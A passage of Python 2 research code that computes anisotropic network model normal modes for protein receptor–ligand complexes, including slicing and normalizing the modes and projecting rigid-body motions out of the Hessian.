self._anm_complex = (self._anm_complex_tilde, self._anm_complex[1])
self._anm_complex_slc = self._anm_complex_tilde_slc
def calcANMsForPart2b(self, reference, counterpart, proteinComplex, ref_chain, counterpart_chain, chain_complex, numberOfModes, encounter, selstr='calpha', whatAtomsToMatch='calpha'):
""" Create the ANMs of the reference, counterpart and complex objects. If set in config, project the hessian matrix of the reference
to ensure 6 zero eigenvalue modes, see formula 8.27 from the book "A practical introduction to the simulation of molecular dynamics", Field. """
self._anm_reference, self._anm_reference_slc = self._calcANMsUnified(reference, ref_chain, numberOfModes, selstr, whatAtomsToMatch)
self._anm_counterpart = calcANM(counterpart, selstr=selstr)
# self._moveSegment(proteinComplex, "L", 50)
numberOfModesComplex = min((proteinComplex.select('calpha').numAtoms()*3 - 6), self.utils.config.maxModesToCalculate)
self._anm_complex, self._anm_complex_slc = self._calcANMsUnified(proteinComplex, chain_complex, numberOfModesComplex, selstr, whatAtomsToMatch)
# project hessian matrix
if self.utils.config.projectHessian:
HC = self._anm_complex[0].getHessian()
if self.utils.isReceptor(reference.getTitle()):
HR = self._anm_reference[0].getHessian()
HL = self._anm_counterpart[0].getHessian()
else:
HR = self._anm_counterpart[0].getHessian()
HL = self._anm_reference[0].getHessian()
HRtilde = HC[:HR.shape[0], :HR.shape[1]]
HLtilde = HC[HR.shape[0]:HR.shape[0]+HL.shape[0], HR.shape[1]:HR.shape[1]+HL.shape[1]]
assert HR.shape == HRtilde.shape
assert HL.shape == HLtilde.shape
##
#writeArray("HRtildefromHC.txt", HRtilde, format='%f')
#writeArray("HLtildefromHC.txt", HLtilde, format='%f')
##
# Create the tilde ANM
self._anm_reference_tilde = ANM(self._anm_reference[0].getTitle()+"_tilde")
# Here the PH'P treatment for the hessian matrix from the normal modes book by Field
if self.utils.isReceptor(reference.getTitle()):
if self.utils.config.modifyHDelta:
print "modifying HR with deltaHR"
HRtilde = self.addscaledHdelta(HR, HRtilde, self.utils.config.deltamultiplicatorForH)
# if using terms with true bound structure second derivation parts r_{ij}-r_{ij}^{2}
if self.utils.config.customHR_A:
#writeArray("originalHR.txt", self._anm_reference[0].getHessian(), format='%f')
HRtilde = self.calcCustomH_A_NeighborsBound(self._anm_reference[0].getHessian(), encounter, selstr)
#writeArray("customHRtilde.txt", HRtilde, format='%f')
print "reference is receptor, shape of HRtilde: ", HRtilde.shape
HRtilde = self.projectHessian(HRtilde, reference, proteinComplex, encounter.getReferenceSegment())
self._anm_reference_tilde.setHessian(HRtilde)
else:
if self.utils.config.modifyHDelta:
print "modifying HL with deltaHL"
HLtilde = self.addscaledHdelta(HL, HLtilde, self.utils.config.deltamultiplicatorForH)
# if using terms with true bound structure second derivation parts r_{ij}-r_{ij}^{2}
if self.utils.config.customHR_A:
#writeArray("originalHL.txt", self._anm_reference[0].getHessian(), format='%f')
HLtilde = self.calcCustomH_A_NeighborsBound(self._anm_reference[0].getHessian(), encounter, selstr)
#writeArray("customHLtilde.txt", HLtilde, format='%f')
print "reference is ligand, shape of HLtilde: ", HLtilde.shape
HLtilde = self.projectHessian(HLtilde, reference, proteinComplex, encounter.getReferenceSegment())
self._anm_reference_tilde.setHessian(HLtilde)
print "finished projecting H, anm_reference_tilde calc modes"
# testing of projected eigenvals
self._anm_reference_tilde.calcModes(n_modes=numberOfModes)
#print "HR eigenvals: ", self._anm_reference[0].getEigvals()[0:10]
#print "HRtilde eigenvals: ", self._anm_reference_tilde.getEigvals()[0:10]
# Extend the self._anm_reference_tilde on all atoms
anm_reference_tilde_extend = extendModel(self._anm_reference_tilde, self._anm_reference[1], reference, norm=True)
# Then slice the anm_reference to the matched
self._anm_reference_tilde_slc = sliceModel(anm_reference_tilde_extend[0], anm_reference_tilde_extend[1], ref_chain.getSelstr())
# Replace reference and reference_slc with the modified ANMs
print "Replacing ANM H with ANM Htilde for the reference"
self._anm_reference = (self._anm_reference_tilde, self._anm_reference[1])
self._anm_reference_slc = self._anm_reference_tilde_slc
if self.utils.config.HR1kHRtilde1k:
self._anm_reference_original, self._anm_reference_slc_original = self._calcANMsUnified(reference, ref_chain, numberOfModes, selstr, whatAtomsToMatch)
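# A commented sketch (an assumption, not the author's projectHessian) of the P H P-style
# projection referenced in the docstrings above: remove the six rigid-body degrees of
# freedom by projecting the Hessian onto the complement of the translation/rotation space.
# def _project_rigid_body_sketch(hessian, coords):
#     import numpy as np
#     n = coords.shape[0]
#     basis = np.zeros((3 * n, 6))
#     for k in range(3):                      # the three rigid translations
#         basis[k::3, k] = 1.0
#     for i, (x, y, z) in enumerate(coords - coords.mean(axis=0)):
#         basis[3 * i:3 * i + 3, 3] = (0.0, -z, y)   # rotation about x
#         basis[3 * i:3 * i + 3, 4] = (z, 0.0, -x)   # rotation about y
#         basis[3 * i:3 * i + 3, 5] = (-y, x, 0.0)   # rotation about z
#     q, _ = np.linalg.qr(basis)              # orthonormal basis of the rigid-body space
#     p = np.eye(3 * n) - np.dot(q, q.T)      # projector onto the internal motions
#     return np.dot(np.dot(p, hessian), p)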
def calcANMsForPart2bIndividualProtein_U1(self, reference, counterpart, proteinComplex, ref_chain, counterpart_chain, chain_complex, numberOfModes, encounter, selstr='calpha', whatAtomsToMatch='calpha'):
""" Create the ANMs of the reference, counterpart and complex objects. If set in config, project the hessian matrix of the reference
to ensure 6 zero eigenvalue modes, see formula 8.27 from the book "A practical introduction to the simulation of molecular dynamics", Field. """
self._anm_reference, self._anm_reference_slc = self._calcANMsUnified(reference, ref_chain, numberOfModes, selstr, whatAtomsToMatch)
self._anm_counterpart = calcANM(counterpart, selstr=selstr)
# self._moveSegment(proteinComplex, "L", 50)
numberOfModesComplex = min((proteinComplex.select('calpha').numAtoms()*3 - 6), self.utils.config.maxModesToCalculate)
self._anm_complex, self._anm_complex_slc = self._calcANMsUnified(proteinComplex, chain_complex, numberOfModesComplex, selstr, whatAtomsToMatch)
###
print "anm_reference anm_counterpart, anm_complex getArray() shapes : ", self._anm_reference[0].getArray().shape, self._anm_counterpart[0].getArray().shape, self._anm_complex[0].getArray().shape
print "anm_reference_slc, anm_complex_slc getArray() shapes : ", self._anm_reference_slc[0].getArray().shape, self._anm_complex_slc[0].getArray().shape
# create custom H via U1
if self.utils.config.customH:
HC = self._anm_complex[0].getHessian()
if self.utils.isReceptor(reference.getTitle()):
HR = self._anm_reference[0].getHessian()
HL = self._anm_counterpart[0].getHessian()
else:
HR = self._anm_counterpart[0].getHessian()
HL = self._anm_reference[0].getHessian()
HRtilde = HC[:HR.shape[0], :HR.shape[1]]
HLtilde = HC[HR.shape[0]:HR.shape[0]+HL.shape[0], HR.shape[1]:HR.shape[1]+HL.shape[1]]
assert HR.shape == HRtilde.shape
assert HL.shape == HLtilde.shape
# for now assert that reference is always the receptor
HCcustomBuild = np.zeros((HC.shape[0], HC.shape[1]))
if self.utils.isReceptor(reference.getTitle()):
if self.utils.config.customHR_A:
#HR, referenceStructure, neighborStructure, encounter, neighborhoodFrom, equilibriumAt, workOnReceptor=True, selstr='calpha'
HRtildeH_ANew = self.calcCustomH_ANew(HR.copy(), encounter.getReference(), encounter.getUnboundCounterpart(), encounter, "C_u", "r_ij", True, selstr)
HLtildeH_ANew = self.calcCustomH_ANew(HL.copy(), encounter.getUnboundCounterpart(), encounter.getReference(), encounter, "C_u", "r_ij", False, selstr)
HRL_new = self.calcCustomH_ANew_IJ(encounter.getReference(), encounter.getUnboundCounterpart(), encounter, False, "r_ij", True, selstr)
print "reference is receptor, shapes of HRtilde, HLtilde, HRL: ", HRtildeH_ANew.shape, HLtildeH_ANew.shape, HRL_new.shape
else:
if self.utils.config.customHR_A:
HRtildeH_ANew = self.calcCustomH_ANew(HR.copy(), encounter.getUnboundCounterpart(), encounter.getReference(), encounter, "C_u", "r_ij", False, selstr)
HLtildeH_ANew = self.calcCustomH_ANew(HL.copy(), encounter.getReference(), encounter.getUnboundCounterpart(), encounter, "C_u", "r_ij", True, selstr)
HRL_new = self.calcCustomH_ANew_IJ(encounter.getUnboundCounterpart(), encounter.getReference(), encounter, False, "r_ij", False, selstr)
print "reference is ligand, shapes of HLtilde, HRtilde, HRL: ", HLtildeH_ANew.shape, HRtildeH_ANew.shape, HRL_new.shape
print "finished projecting H, anm_reference_tilde calc modes"
# put the new HRtilde and HLtilde inside HC
HCcustomBuild[:HR.shape[0], :HR.shape[1]] = HRtildeH_ANew
HCcustomBuild[HR.shape[0]:HR.shape[0]+HL.shape[0], HR.shape[1]:HR.shape[1]+HL.shape[1]] = HLtildeH_ANew
HCcustomBuild[0:HR.shape[0], HR.shape[1]:HR.shape[1]+HL.shape[1]] = HRL_new
HCcustomBuild[HR.shape[0]:HR.shape[0]+HL.shape[0], 0:HR.shape[1]] = HRL_new.T
#assert np.allclose(HC, HCcustomBuild)
#sys.exit()
# Project the reference part in the HCcustomBuild matrix
if self.utils.isReceptor(reference.getTitle()):
if self.utils.config.customHR_A:
HCcustomBuildprojected = self.projectHessian(HCcustomBuild.copy(), reference, proteinComplex, "R", True)
else:
if self.utils.config.customHR_A:
HCcustomBuildprojected = self.projectHessian(HCcustomBuild.copy(), reference, proteinComplex, "L", True)
# Create the custom complex ANM
self._anm_complex_tilde = ANM(self._anm_complex[0].getTitle()+"_tilde")
self._anm_complex_tilde.setHessian(HCcustomBuildprojected)
if self.utils.config.enforceAllModesAfterProjection:
self._anm_complex_tilde.calcModes(n_modes=numberOfModes, zeros=True)
else:
self._anm_complex_tilde.calcModes(n_modes=numberOfModes)
# Extend the self._anm_reference_tilde on all atoms
anm_complex_tilde_extend = extendModel(self._anm_complex_tilde, self._anm_complex[1], proteinComplex, norm=True)
# Then slice the anm_complex to the matched atoms
self._anm_complex_tilde_slc = sliceModel(anm_complex_tilde_extend[0], anm_complex_tilde_extend[1], chain_complex.getSelstr())
# Replace the complex anm and the complex_slc anm with the modified ANMs
print "Replacing ANM H with ANM Htilde for the complex"
self._anm_complex = (self._anm_complex_tilde, self._anm_complex[1])
self._anm_complex_slc = self._anm_complex_tilde_slc
# Create custom anm for reference
if self.utils.config.enforceAllModesAfterProjection:
Marray = self.utils.sliceComplexModestoMatchProtein(self._anm_complex[0].getArray()[:,6:], reference, encounter.getReferenceSegment())
self._anm_reference_tilde = ANM(self._anm_reference[0].getTitle()+"_tilde")
self._anm_reference_tilde.setEigens(Marray, self._anm_complex[0].getEigvals()[6:])
else:
Marray = self.utils.sliceComplexModestoMatchProtein(self._anm_complex[0].getArray(), reference, encounter.getReferenceSegment())
self._anm_reference_tilde = ANM(self._anm_reference[0].getTitle()+"_tilde")
self._anm_reference_tilde.setEigens(Marray, self._anm_complex[0].getEigvals())
# Extend the self._anm_reference_tilde on all atoms
anm_reference_tilde_extend = extendModel(self._anm_reference_tilde, self._anm_reference[1], reference, norm=True)
# Then slice the anm_reference to the matched
self._anm_reference_tilde_slc = sliceModel(anm_reference_tilde_extend[0], anm_reference_tilde_extend[1], ref_chain.getSelstr())
#
# try modes comparison
# ranges = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 20, 30, 40, 50, 60, 70]
#
# try:
# subspaceOverlaps = []
# for val in ranges:
# subspaceOverlaps.append(calcSubspaceOverlap(self._anm_reference[0][0:val], self._anm_reference_tilde[0:val]))
# encounter.storeSubSpaceOverlaps(subspaceOverlaps, ranges)
# except Exception:
# sys.exc_clear()
#
# try:
# MarrayNormed = self.utils.normalized(Marray.copy(), axis=0)
# anm_reference_tilde_normed = ANM(self._anm_reference[0].getTitle()+"_tildenormed")
# anm_reference_tilde_normed.setEigens(MarrayNormed, self._anm_complex[0].getEigvals())
# covarianceOverlaps = []
# for val in ranges:
# covarianceOverlaps.append(calcCovOverlap(self._anm_reference[0][0:val], anm_reference_tilde_normed[0:val]))
# encounter.storeCovarianceOverlap(covarianceOverlaps, ranges)
# except Exception, err:
# #sys.exc_clear()
# print "Exception covarianceoverlap occurred: ", err
# print traceback.format_exc()
#
# try:
# overlapTable = getOverlapTable(self._anm_reference[0], self._anm_reference_tilde)
# encounter.storeOverlapTable(overlapTable)
# except Exception:
# sys.exc_clear()
#
# Replace reference and reference_slc with the modified ANMs
print "Replacing ANM H with ANM Htilde for the reference"
self._anm_reference = (self._anm_reference_tilde, self._anm_reference[1])
self._anm_reference_slc = self._anm_reference_tilde_slc
def _calcANMsUnified(self, reference, numberOfModes, selstr='calpha', whatAtomsToMatch='calpha', direct_call = None, ref_chain = None):
# Create the anm of the reference
#writePDB(reference.getTitle()+"forANMmoved.pdb", reference)
if self.utils.config.calculateZeroEigvalModes == True:
anm_reference = calcANM(reference, n_modes=numberOfModes, selstr=selstr, zeros=True)
else:
anm_reference = calcANM(reference, n_modes=numberOfModes, selstr=selstr)
# Extend the anm_reference on all atoms
anm_reference_extend = extendModel(anm_reference[0], anm_reference[1], reference, norm=True)
# Then slice the anm_reference to the matched
if direct_call == None:
if self.bound_provided == True:
anm_reference_slc = sliceModel(anm_reference_extend[0], anm_reference_extend[1], ref_chain.getSelstr())
else:
anm_reference_slc = sliceModel(anm_reference_extend[0], anm_reference_extend[1], selstr)
else:
anm_reference_slc = sliceModel(anm_reference_extend[0], anm_reference_extend[1], selstr)
# Normalize the slices anm
anm_reference_slc = self.getNormalizedANM(anm_reference_slc)
if direct_call == True:
self._anm_reference = anm_reference
self._anm_reference_slc = anm_reference_slc
else:
return anm_reference, anm_reference_slc
def getNormalizedANM(self, anm):
""" Normalize the modes of the anm and return this anm object
Args:
anm: the anm with modes calculated
Returns: anm with normalized modes
"""
M = self.normalizeM(anm[0].getArray())
eigenvals = anm[0].getEigvals()
anm[0].setEigens(M, eigenvals)
return anm
def _moveSegment(self, reference, segment, angstrom):
""" Move all atoms x,y,z, belonging to the segment the number in angstrom """
print "15 ang contact before moving atoms:", reference.select('same residue as exwithin 15 of segment "L." ').numAtoms()
ref_select = reference.select('segment \"'+segment+'.\"')
ref_select.setCoords(ref_select.getCoords()+angstrom)
if reference.select('same residue as exwithin 15 of segment "L." ') != None:
print "15 ang contact after moving atoms: ", reference.select('same residue as exwithin 15 of segment "L." ').numAtoms()
else:
print "15 ang contact after moving atoms: 0"
def replaceReferenceANMs(self, anm_new, reference, ref_chain = None):
""" Replace the anm of reference with anm_new and normalize along the way.
Args:
anm_new: the new ANM
reference: the protein the ANM was created on
ref_chain: the matched chains of reference
Result:
replaced self._anm_reference and self._anm_reference_slc based on normalized anm_new
"""
self._anm_reference = anm_new
self._anm_reference = self.getNormalizedANM(self._anm_reference)
# Extend the self._anm_reference to all atoms
anm_reference_extend = extendModel(self._anm_reference[0], self._anm_reference[1], reference, norm=True)
# Then slice the anm_reference to the matched atoms
if ref_chain != None:
self._anm_reference_slc = sliceModel(anm_reference_extend[0], anm_reference_extend[1], ref_chain.getSelstr())
else:
self._anm_reference_slc = sliceModel(anm_reference_extend[0], anm_reference_extend[1], 'calpha')
self._anm_reference_slc = self.getNormalizedANM(self._anm_reference_slc)
def replaceComplexANMs(self, anm_new, proteinComplex, complex_chain = None):
""" Replace the anm of the complex with anm_new and normalize along the way.
Args:
anm_new: the new ANM
proteinComplex: the complex that the ANM was created on
complex_chain: the matched chains of the complex
Result:
replaced self._anm_complex and self._anm_complex_slc based on normalized anm_new
"""
self._anm_complex = anm_new
self._anm_complex = self.getNormalizedANM(self._anm_complex)
# Extend the self._anm_complex to all atoms
anm_complex_extend = extendModel(self._anm_complex[0], self._anm_complex[1], proteinComplex, norm=True)
# Then slice the anm_complex to the matched atoms
if complex_chain != None:
self._anm_complex_slc = sliceModel(anm_complex_extend[0], anm_complex_extend[1], complex_chain.getSelstr())
else:
self._anm_complex_slc = sliceModel(anm_complex_extend[0], anm_complex_extend[1], 'calpha')
self._anm_complex_slc = self.getNormalizedANM(self._anm_complex_slc)
def calcANMSlcInterface(self, ref_chain_interface, reference, titleOfReferenceSingleProtein, isBoundComplex=False):
self._anm_slc_interface = self.getSlicedInterfaceANM(self.getANMExtend(), ref_chain_interface, reference, titleOfReferenceSingleProtein, isBoundComplex)
def getSlicedInterfaceANM(self, anm_ext, ref_chain_interface, reference, titleOfReferenceSingleProtein, isBoundComplex=False):
selectionAtoms = self.createSlcSelectionString(reference, isBoundComplex, ref_chain_interface, titleOfReferenceSingleProtein)
anm_slc_interface = sliceModel(anm_ext[0], anm_ext[1], selectionAtoms)
return anm_slc_interface
def calcInterfaceANMsforPart2a2k(self, encounter):
self._anm_reference_slc_interface = self._slicedInterfaceANMs(self._anm_reference, encounter.getMobile(), encounter.getMobChainInterface())
self._anm_counterpart_slc_interface = self._slicedInterfaceANMs(self._anm_counterpart, encounter.getBoundCounterpart(), encounter.getBoundCounterpartChainInterface())
self._anm_boundcomplex_slc_interface = self._slicedInterfaceANMs(self._anm_complex, encounter.boundComplex.complex , encounter.getBoundComplexChainInterface())
assert (self._anm_reference_slc_interface[1].numAtoms()
+ self._anm_counterpart_slc_interface[1].numAtoms()
== self._anm_boundcomplex_slc_interface[1].numAtoms())
for i in range(0, self._anm_reference_slc_interface[1].numAtoms()):
assert self._anm_reference_slc_interface[1][i].getResname() == self._anm_boundcomplex_slc_interface[1][i].getResname()
assert np.alltrue(self._anm_reference_slc_interface[1][i].getCoords() == self._anm_boundcomplex_slc_interface[1][i].getCoords())
assert self._anm_reference_slc_interface[1][i].getName() == self._anm_boundcomplex_slc_interface[1][i].getName()
offsetAtoms = self._anm_reference_slc_interface[1].numAtoms()
for i in range(0, self._anm_counterpart_slc_interface[1].numAtoms()):
j = i + offsetAtoms
assert self._anm_counterpart_slc_interface[1][i].getResname() == self._anm_boundcomplex_slc_interface[1][j].getResname()
assert np.alltrue(self._anm_counterpart_slc_interface[1][i].getCoords() == self._anm_boundcomplex_slc_interface[1][j].getCoords())
assert self._anm_counterpart_slc_interface[1][i].getName() == self._anm_boundcomplex_slc_interface[1][j].getName()
def calcInterfaceANMsUnified(self, reference, counterpart, proteinComplex, ref_chain_interface, counterpart_chain_interface, complex_chain_interface):
""" Calculate (slice) the ANMs according to the interfaces on prot1, prot2 and their complex representation.
Args:
reference: prot1
counterpart: prot2
proteinComplex: prot1 and prot2 as one parsed object
ref_chain_interface: interface of prot1
counterpart_chain_interface: interface of prot2
complex_chain_interface: interface of the proteinComplex
"""
self._anm_reference_slc_interface = self._slicedInterfaceANMs(self._anm_reference, reference, ref_chain_interface)
self._anm_counterpart_slc_interface = self._slicedInterfaceANMs(self._anm_counterpart, counterpart, counterpart_chain_interface)
self._anm_boundcomplex_slc_interface = self._slicedInterfaceANMs(self._anm_complex, proteinComplex, complex_chain_interface)
# normalize modes
self._anm_reference_slc_interface = self.getNormalizedANM(self._anm_reference_slc_interface)
self._anm_counterpart_slc_interface = self.getNormalizedANM(self._anm_counterpart_slc_interface)
self._anm_boundcomplex_slc_interface = self.getNormalizedANM(self._anm_boundcomplex_slc_interface)
assert (self._anm_reference_slc_interface[1].numAtoms()
+ self._anm_counterpart_slc_interface[1].numAtoms()
== self._anm_boundcomplex_slc_interface[1].numAtoms())
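# Optional atom-by-atom consistency check (disabled by default): verify that the sliced
# reference and counterpart interface atoms line up with the complex interface atoms,
# taking into account whether the reference is the receptor (its atoms come first in the
# complex ordering) or the ligand (offset by the counterpart atoms).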
assertANMAtomEquality = False
if assertANMAtomEquality:
if self.utils.isReceptor(reference.getTitle()):
for i in range(0, self._anm_reference_slc_interface[1].numAtoms()):
# print i, self._anm_reference_slc_interface[1][i].getCoords(), self._anm_boundcomplex_slc_interface[1][i].getCoords()
assert self._anm_reference_slc_interface[1][i].getResname() == self._anm_boundcomplex_slc_interface[1][i].getResname()
assert np.alltrue(self._anm_reference_slc_interface[1][i].getCoords() == self._anm_boundcomplex_slc_interface[1][i].getCoords())
# item1roundedChoords = [round(x, 3) for x in self._anm_reference_slc_interface[1][i].getCoords().tolist()]
# item2roundedChoords = [round(x, 3) for x in self._anm_boundcomplex_slc_interface[1][i].getCoords().tolist()]
# assert np.alltrue(item1roundedChoords == item2roundedChoords)
assert self._anm_reference_slc_interface[1][i].getName() == self._anm_boundcomplex_slc_interface[1][i].getName()
offsetAtoms = self._anm_reference_slc_interface[1].numAtoms()
for i in range(0, self._anm_counterpart_slc_interface[1].numAtoms()):
j = i + offsetAtoms
assert self._anm_counterpart_slc_interface[1][i].getResname() == self._anm_boundcomplex_slc_interface[1][j].getResname()
assert np.alltrue(self._anm_counterpart_slc_interface[1][i].getCoords() == self._anm_boundcomplex_slc_interface[1][j].getCoords())
# item1roundedChoords = [round(x, 3) for x in self._anm_counterpart_slc_interface[1][i].getCoords().tolist()]
# item2roundedChoords = [round(x, 3) for x in self._anm_boundcomplex_slc_interface[1][j].getCoords().tolist()]
# assert np.alltrue(item1roundedChoords == item2roundedChoords)
assert self._anm_counterpart_slc_interface[1][i].getName() == self._anm_boundcomplex_slc_interface[1][j].getName()
else:
offsetAtoms = self._anm_counterpart_slc_interface[1].numAtoms()
for i in range(0, self._anm_reference_slc_interface[1].numAtoms()):
j = i + offsetAtoms
# print i, self._anm_reference_slc_interface[1][i].getCoords(), self._anm_boundcomplex_slc_interface[1][i].getCoords()
assert self._anm_reference_slc_interface[1][i].getResname() == self._anm_boundcomplex_slc_interface[1][j].getResname()
assert np.alltrue(self._anm_reference_slc_interface[1][i].getCoords() == self._anm_boundcomplex_slc_interface[1][j].getCoords())
# item1roundedChoords = [round(x, 3) for x in self._anm_reference_slc_interface[1][i].getCoords().tolist()]
# item2roundedChoords = [round(x, 3) for x in self._anm_boundcomplex_slc_interface[1][j].getCoords().tolist()]
# assert np.alltrue(item1roundedChoords == item2roundedChoords)
assert self._anm_reference_slc_interface[1][i].getName() == self._anm_boundcomplex_slc_interface[1][j].getName()
for i in range(0, self._anm_counterpart_slc_interface[1].numAtoms()):
assert self._anm_counterpart_slc_interface[1][i].getResname() == self._anm_boundcomplex_slc_interface[1][i].getResname()
assert np.alltrue(self._anm_counterpart_slc_interface[1][i].getCoords() == self._anm_boundcomplex_slc_interface[1][i].getCoords())
# item1roundedChoords = [round(x, 3) for x in self._anm_counterpart_slc_interface[1][i].getCoords().tolist()]
# item2roundedChoords = [round(x, 3) for x in self._anm_boundcomplex_slc_interface[1][i].getCoords().tolist()]
# assert np.alltrue(item1roundedChoords == item2roundedChoords)
assert self._anm_counterpart_slc_interface[1][i].getName() == self._anm_boundcomplex_slc_interface[1][i].getName()
def _slicedInterfaceANMs(self, anm, reference, interface):
""" Slice an anm to match the provided interface.
Args:
anm: the anm to be sliced
reference: the protein that the anm is based upon, necessary for extending the model first
interface: the interface of the protein
"""
anm_ext = extendModel(anm[0], anm[1], reference, norm=True)
anm_slc = sliceModel(anm_ext[0], anm_ext[1], interface.getSelstr())
anm_slc = self.getNormalizedANM(anm_slc)
return anm_slc
def getANM(self):
""" Get the ANM calculated on the reference (default) calpha atoms. """
if self._anm == None:
raise Exception('self._anm == None')
return self._anm
def getANMExtend(self):
""" Get the ANM extended to the whole reference (all atoms). """
if self._anm_extend == None:
raise Exception('self._anm_extend == None')
return self._anm_extend
def getANMSlc(self):
""" Get the sliced back ANM to match all atoms in the ref_chain."""
if self._anm_slc == None:
raise Exception('self._anm_slc == None')
return self._anm_slc
def getANMSlcCounterpart(self):
""" Get the sliced back ANM to match all atoms in the counterpart chain(s) """
if self._anm_slc_counterpart == None:
raise Exception('self._anm_slc_counterpart == None')
return self._anm_slc_counterpart
def getANMSlcInterface(self):
""" Get the sliced back ANM to match all atoms in the ref_chain_interface. """
if self._anm_slc_interface == None:
raise Exception('self._anm_slc_interface == None')
return self._anm_slc_interface
def getANMComplexSlc(self):
""" Get the sliced back ANM to match all atoms in the chain_complex. """
if self._anm_complex_slc == None:
raise Exception('self._anm_complex_slc == None')
return self._anm_complex_slc
def getANMReference2a2kSlc(self):
""" Get the sliced back self._anm_reference_slc ANM to match all atoms in the reference variable. """
if self._anm_reference_slc == None:
raise Exception('self._anm_reference_slc == None')
return self._anm_reference_slc
def getANMCounterpart2a2kSlc(self):
""" Get the sliced back self._anm_counterpart_slc ANM to match all atoms in the counterpart variable. """
if self._anm_counterpart_slc == None:
raise Exception('self._anm_counterpart_slc == None')
return self._anm_counterpart_slc
def getANMReference(self):
if self._anm_reference == None:
raise Exception('self._anm_reference == None')
return self._anm_reference
def getANMReferenceSlc(self):
if self._anm_reference_slc == None:
raise Exception('self._anm_reference_slc == None')
return self._anm_reference_slc
def getANMCounterpart(self):
if self._anm_counterpart == None:
raise Exception('self._anm_counterpart == None')
return self._anm_counterpart
def getANMComplex(self):
if self._anm_complex == None:
raise Exception('self._anm_complex == None')
return self._anm_complex
def getANMReferenceSlcInterface(self):
if self._anm_reference_slc_interface == None:
raise Exception('self._anm_reference_slc_interface == None')
return self._anm_reference_slc_interface
def getANMCounterpartSlcInterface(self):
if self._anm_counterpart_slc_interface == None:
raise Exception('self._anm_counterpart_slc_interface == None')
return self._anm_counterpart_slc_interface
def getANMComplexSlcInterface(self):
if self._anm_boundcomplex_slc_interface == None:
raise Exception('self._anm_boundcomplex_slc_interface == None')
return self._anm_boundcomplex_slc_interface
def getANMPath(self, reference, numberOfModes, selstr, whatAtomsToMatch, modified=""):
path = self.utils.config.anmPath
prefix = reference.getTitle()
prefix = prefix.replace(" ", "_")
if modified == "":
return path+prefix+"_modes"+str(numberOfModes)+"_buildOn"+selstr+"_matchedOn"+whatAtomsToMatch
elif modified == "extended":
return path+"extended/"+prefix+"_modes"+str(numberOfModes)+"_buildOn"+selstr+"_matchedOn"+whatAtomsToMatch+"_extended"
elif modified == "slicedback":
return path+"slicedback/"+prefix+"_modes"+str(numberOfModes)+"_buildOn"+selstr+"_matchedOn"+whatAtomsToMatch+"_slicedback"
else:
raise Exception("the variable modified is not the empty string, extended or slicedback.")
def doesANMExist(self, reference, numberOfModes, selstr, whatAtomsToMatch, modified=""):
path = self.utils.config.anmPath
try:
with open(self.getANMPath(reference, numberOfModes, selstr, whatAtomsToMatch, modified)+".anm.npz"):
return True
except IOError:
return False
def projectHessian(self, hessian, reference, proteinComplex, referenceSegment, projectionStyle, projectOnlyReferencePartOfHC=False, interCalphaIndices=None):
""" Return the PH'P hessian which has 6 zero eigenvalues according to the formula 8.27
from the book "A practical introduction to the simulation of molecular dynamics", Field.
However, here it is made sure that the assumed basis is orthonormal via np.linalg.qr applied
on the six vectors discussed in this book.
Args:
hessian: the hessian to be projected
reference: the protein the hessian or HRtilde/HLtilde of the hessian was created on
proteinComplex: the whole protein that reference is part of
referenceSegment: if reference is receptor, provide "R", else it needs to be ligand, provide "L"
projectionStyle: project away from "full" (intra+inter) or "intra" (intra) or "fullComplex"
projectOnlyReferencePartOfHC: if true, the hessian was created on reference, if false, HRtilde or HLtilde
of the hessian were created on the reference
interCalphaIndices: list of calphas indices that have intermolecular interactions
Returns: projected hessian with 6 external degrees of freedom (rotation and translation) removed
"""
assert projectionStyle == "full" or projectionStyle == "intra" or projectionStyle == "fullComplex"
normalize = True
numAtoms = reference.select('calpha').numAtoms()
numCoords = numAtoms*3
centerOfCoords = calcCenter(reference.select('calpha'))
assert np.alltrue(centerOfCoords == calcCenter(proteinComplex.select('segment \"'+referenceSegment+'.\"').select('calpha')))
print "before projection symmetry ==, allclose: ", np.all(hessian-hessian.T==0), np.allclose(hessian, hessian.T)
if projectOnlyReferencePartOfHC:
numComplexAtoms = proteinComplex.select('calpha').numAtoms()
numComplexCoords = numComplexAtoms*3
numCounterpartCoords = numComplexCoords - numCoords
if referenceSegment == "R":
assert numCounterpartCoords == proteinComplex.select('segment \"L.\"').select('calpha').numAtoms() * 3
else:
assert numCounterpartCoords == proteinComplex.select('segment \"R.\"').select('calpha').numAtoms() * 3
# Create null vector with length of the counterpart calphas
counterPartNullVector = np.zeros(numCounterpartCoords)
# Create I
I = np.identity(numCoords)
# Create the three translation vectors Tx, Ty, Tz
Tx = np.zeros(numCoords)
Tx = self.utils.fill3DArrayWithValue(Tx, 1.0, 0)
Ty = np.zeros(numCoords)
Ty = self.utils.fill3DArrayWithValue(Ty, 1.0, 1)
Tz = np.zeros(numCoords)
Tz = self.utils.fill3DArrayWithValue(Tz, 1.0, 2)
# Create the three rotation vectors Rx, Ry, Rz
coordsCopy = reference.select('calpha').getCoords().copy()
Rx = self.utils.createRx(coordsCopy)
coordsCopy2 = reference.select('calpha').getCoords().copy()
Ry = self.utils.createRy(coordsCopy2)
coordsCopy3 = reference.select('calpha').getCoords().copy()
Rz = self.utils.createRz(coordsCopy3)
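# The translation vectors carry a 1 at every x, y or z coordinate respectively; createRx,
# createRy and createRz are assumed to build the infinitesimal rigid rotation vectors about
# the coordinate axes, i.e. per atom roughly (0, -z, y), (z, 0, -x) and (-y, x, 0).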
# remove inter atoms from projection
if projectionStyle == "intra":
Tx = self.removeInterAtoms(Tx, interCalphaIndices)
Ty = self.removeInterAtoms(Ty, interCalphaIndices)
Tz = self.removeInterAtoms(Tz, interCalphaIndices)
Rx = self.removeInterAtoms(Rx, interCalphaIndices)
Ry = self.removeInterAtoms(Ry, interCalphaIndices)
Rz = self.removeInterAtoms(Rz, interCalphaIndices)
if projectOnlyReferencePartOfHC:
# overwrite previous I
I = np.identity(numComplexCoords)
# extend (with the nullvector) the rotational and translational vectors to the dimension of the complex
if referenceSegment == "R":
Tx = np.concatenate((Tx, counterPartNullVector))
Ty = np.concatenate((Ty, counterPartNullVector))
Tz = np.concatenate((Tz, counterPartNullVector))
Rx = np.concatenate((Rx, counterPartNullVector))
Ry = np.concatenate((Ry, counterPartNullVector))
Rz = np.concatenate((Rz, counterPartNullVector))
else:
Tx = np.concatenate((counterPartNullVector, Tx))
Ty = np.concatenate((counterPartNullVector, Ty))
Tz = np.concatenate((counterPartNullVector, Tz))
Rx = np.concatenate((counterPartNullVector, Rx))
Ry = np.concatenate((counterPartNullVector, Ry))
